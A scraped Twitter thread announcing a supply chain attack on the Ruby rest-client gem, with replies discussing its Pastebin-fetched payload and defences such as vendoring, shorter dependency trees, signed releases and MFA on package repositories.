PSA: Supply chain attack on rest-client, an extremely widely deployed Ruby library.https://github.com/rest-client/rest-client/issues/713 …
-
-
Having your application evaluate code grabbed from Pastebin at runtime [0] will *also* pose some cultural challenges, though. [0] The attack payload here.
Show this threadThanks. Twitter will use this to make your timeline better. UndoUndo
-
-
-
There’s serious tension between grabbing the latest compromised gem & leaving libxml RCE unpatched. The unspeakable answer is to use shorter dependency trees.
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
-
-
i’m really excited that rust’s default build tool has vendoring built in now for this reason. vendoring deps locally is one way to force them through code review
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
-
-
Delays the exploit window by a random time, doesn’t eliminate it though. Encourage ecosystems towards signed releases & MFA & multisig on package repositories and allow consumer side to filter/fund?
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.